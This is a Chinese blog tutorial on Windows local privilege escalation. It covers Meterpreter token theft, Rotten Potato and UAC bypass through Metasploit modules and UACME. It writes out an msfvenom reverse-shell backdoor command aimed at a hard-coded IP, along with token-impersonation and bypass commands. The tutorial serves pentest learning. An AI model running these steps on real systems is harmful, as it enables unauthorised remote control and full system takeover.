windows本地提权--令牌窃取烂土豆UAC

2024-04-23 20:28

本文主要是介绍windows本地提权--令牌窃取烂土豆UAC,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等...

目录

一.令牌窃取

操作:

1-生成-->上传后门后,让msf上线

2-执行命令

二.烂土豆(MS16-075)

操作:

1-先让MSF上线

2-上传烂土豆

3-执行命令

三.UAC(用户账户控制)

1-MSF模块提权

2-UACME 项目(yyds)


本地--->system

一.令牌窃取

令牌窃取:  Win2008 Win2012

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。

所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击.

操作:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=39.105.154.133 LPORT=8888 -f exe -o msf.exe
getuid
use incognitolist_tokens -u	#展示令牌impersonate_token "NT AUTHORITY\SYSTEM"	#窃取令牌

1-生成-->上传后门后,让msf上线

2-执行命令


二.烂土豆(MS16-075)

---与令牌窃取差不多. 

操作:

1-先让MSF上线

2-上传烂土豆

3-执行命令

getuid       pwd        cd C://        //到烂土豆目录下.execute -cH -f ./potato.exe        //执行烂土豆use incognito        //窃取令牌模块list_tokens -u       //查看可以窃取权限impersonate_token "NT AUTHORITY\SYSTEM"    //窃取权限


三.UAC(用户账户控制)

快速定位命令: msconfig

为了远程执行目标的 exe 或者 bat 可执行文件绕过此安全机制,以此叫 BypassUAC .

绕过项目:MSF 内置,Powershell 渗透框架,UACME 项目(推荐).

开启 UAC 和 未开启 UAC 时,MSF 默认 getsystem 提权影响(进程注入).

1-MSF模块提权

----先让MSF上线.

msf先上线
getuid
getsystem		#遇到UAC就不行了.-->用模块search uacuac没开---getsystem直接成功uac开了	(win7)
use exploit/windows/local/bypassuac
--成功uac开了(默认状态)	(win10) 
上面的模块就不行了
use exploit/windows/local/ask
--这个模块需要靶机点击是才能成功.(条件苛刻)自动化:
use exploit/windows/local/bypassuac_sluihijack  
--成功use exploit/windows/local/bypassuac_silentcleanup  
--成功

2-UACME 项目(yyds)

GitHub - hfiref0x/UACME: Defeating Windows User Account Control

---该项目需要反编译一下,然后再上传运行.

--先让MSF上线 

#反编译之后--->上传Akagi64.exe-->命令执行Akagi64.exe 41 msf.exe	(前面为反编译好的软件,中间值为模式的选择,最后为后门路径)(76种)
Akagi64.exe 编号 调用执行
#原理:以UAC项目运行后门,进行绕过getuidgetsystem


这篇关于windows本地提权--令牌窃取烂土豆UAC的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/929795

相关文章

使用Python实现快速搭建本地HTTP服务器

《使用Python实现快速搭建本地HTTP服务器》:本文主要介绍如何使用Python快速搭建本地HTTP服务器,轻松实现一键HTTP文件共享,同时结合二维码技术,让访问更简单,感兴趣的小伙伴可以了... 目录1. 概述2. 快速搭建 HTTP 文件共享服务2.1 核心思路2.2 代码实现2.3 代码解读3.

在java中如何将inputStream对象转换为File对象(不生成本地文件)

《在java中如何将inputStream对象转换为File对象(不生成本地文件)》:本文主要介绍在java中如何将inputStream对象转换为File对象(不生成本地文件),具有很好的参考价... 目录需求说明问题解决总结需求说明在后端中通过POI生成Excel文件流,将输出流(outputStre

SpringBoot配置Ollama实现本地部署DeepSeek

《SpringBoot配置Ollama实现本地部署DeepSeek》本文主要介绍了在本地环境中使用Ollama配置DeepSeek模型,并在IntelliJIDEA中创建一个Sprin... 目录前言详细步骤一、本地配置DeepSeek二、SpringBoot项目调用本地DeepSeek前言随着人工智能技

Windows Server服务器上配置FileZilla后,FTP连接不上?

《WindowsServer服务器上配置FileZilla后,FTP连接不上?》WindowsServer服务器上配置FileZilla后,FTP连接错误和操作超时的问题,应该如何解决?首先,通过... 目录在Windohttp://www.chinasem.cnws防火墙开启的情况下,遇到的错误如下:无法与

OpenManus本地部署实战亲测有效完全免费(最新推荐)

《OpenManus本地部署实战亲测有效完全免费(最新推荐)》文章介绍了如何在本地部署OpenManus大语言模型,包括环境搭建、LLM编程接口配置和测试步骤,本文给大家讲解的非常详细,感兴趣的朋友一... 目录1.概况2.环境搭建2.1安装miniconda或者anaconda2.2 LLM编程接口配置2

Python解析器安装指南分享(Mac/Windows/Linux)

《Python解析器安装指南分享(Mac/Windows/Linux)》:本文主要介绍Python解析器安装指南(Mac/Windows/Linux),具有很好的参考价值,希望对大家有所帮助,如有... 目NMNkN录1js. 安装包下载1.1 python 下载官网2.核心安装方式3. MACOS 系统安

Windows系统下如何查找JDK的安装路径

《Windows系统下如何查找JDK的安装路径》:本文主要介绍Windows系统下如何查找JDK的安装路径,文中介绍了三种方法,分别是通过命令行检查、使用verbose选项查找jre目录、以及查看... 目录一、确认是否安装了JDK二、查找路径三、另外一种方式如果很久之前安装了JDK,或者在别人的电脑上,想

Windows命令之tasklist命令用法详解(Windows查看进程)

《Windows命令之tasklist命令用法详解(Windows查看进程)》tasklist命令显示本地计算机或远程计算机上当前正在运行的进程列表,命令结合筛选器一起使用,可以按照我们的需求进行过滤... 目录命令帮助1、基本使用2、执行原理2.1、tasklist命令无法使用3、筛选器3.1、根据PID

Python中Windows和macOS文件路径格式不一致的解决方法

《Python中Windows和macOS文件路径格式不一致的解决方法》在Python中,Windows和macOS的文件路径字符串格式不一致主要体现在路径分隔符上,这种差异可能导致跨平台代码在处理文... 目录方法 1:使用 os.path 模块方法 2:使用 pathlib 模块(推荐)方法 3:统一使

在VSCode中本地运行DeepSeek的流程步骤

《在VSCode中本地运行DeepSeek的流程步骤》本文详细介绍了如何在本地VSCode中安装和配置Ollama和CodeGPT,以使用DeepSeek进行AI编码辅助,无需依赖云服务,需要的朋友可... 目录步骤 1:在 VSCode 中安装 Ollama 和 CodeGPT安装Ollama下载Olla